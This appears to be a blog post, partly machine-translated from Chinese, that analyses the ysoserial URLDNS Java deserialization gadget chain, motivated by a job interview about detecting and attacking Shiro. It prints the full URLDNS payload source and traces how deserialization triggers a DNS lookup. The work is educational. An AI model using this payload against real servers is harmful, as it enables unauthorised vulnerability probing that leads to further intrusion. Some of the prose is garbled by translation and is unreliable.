Due to the recent course of the interview was asked yso in URLDNS this works pop chain, when it comes to this interview because when it comes to shiro of how to detect and how to attack. In fact, in actual combat with JRMP actually more accurate than URLDNS (subsequent repeat this trick).
At that time because there is no analysis URLDNS and JRMP, so ask to URLDNS of pop chain on the ignorant, did not answer them. So now analyze URLDNS this code it.
public class URLDNS implements ObjectPayload<Object> { public Object getObject(final String url) throws Exception { //Avoid DNS resolution during payload creation //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload. URLStreamHandler handler = new SilentURLStreamHandler(); HashMap ht = new HashMap(); // HashMap that will contain the URL URL u = new URL(null, url, handler); // URL to use as the Key ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered. return ht; } public static void main(final String[] args) throws Exception { PayloadRunner.run(URLDNS.class, args); } /** * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance. * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior * using the serialized object.</p> * * <b>Potential false negative:</b> * <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the * second resolution.</p> */ static class SilentURLStreamHandler extends URLStreamHandler { protected URLConnection openConnection(URL u) throws IOException { return null; } protected synchronized InetAddress getHostAddress(URL u) { return null; } } }
Links in comments quite understand:
Gadget Chain *:
* HashMap.readObject ()
* HashMap.putVal ()
* HashMap.hash ()
* URL.hashCode ()
now follow comments specific analysis.
First: URLStreamHandler, quote others understanding of this class.
In general, the format of the URL is: protocol: // [authority] hostname: port / resource queryString?. URL class can parse out the protocol, hostname, port and other information. Protocol specification determines the interaction, common protocols, such as HTTP, File, FTP and other protocols, JDK comes with the default communication implementation. Of course, the custom implementation is allowed. Hostname and port for general or based on Socket Socket other communication protocols. Resource That resource context. Readers may use URL, read and write to get the specified resource by specifying the protocol (protocol), such as a built-in JDK treatment HTTP, File, FTP and other protocols.
After successfully constructed URL example, the API defines a URL the openConnection () method returns an instance of an abstract type java.net.URLConnection. However, there is a URL object proxy object, the actual call is, openConnection () method java.net.URLStreamHandler object.
I think it can be understood as URLStreamHandler handler = new SilentURLStreamHandler (); initialization is a way to instances when your URL will be called differently depending on the class method. openConnection and getHostAddress is customizable, a custom protocol may be described, the custom protocols do custom operations.
Next, an example of a class hashmap.
URL u = new URL (null, url, handler); according to notes is the meaning of our controlled url becomes key as hashmap instance.
u is an example of a URL, the main operation is divided by the url corresponding handler. Properties are as follows:
Then controlled url to value.
ht.put(u,url)。就是把key和value传到hashmap里。
hashmap的理解参考这篇文章:https://www.breakyizhan.com/java/4653.html
最后ht的内容为
简单来说就是把ht处理成一个hashmap的实例,key为url的上下环境实例,value就是单纯的url。
然后对这个hashmap进行序列化的内容,然后再反序列化的时候触发访问这个域名的。
ser就是反序列化的字节流内容。
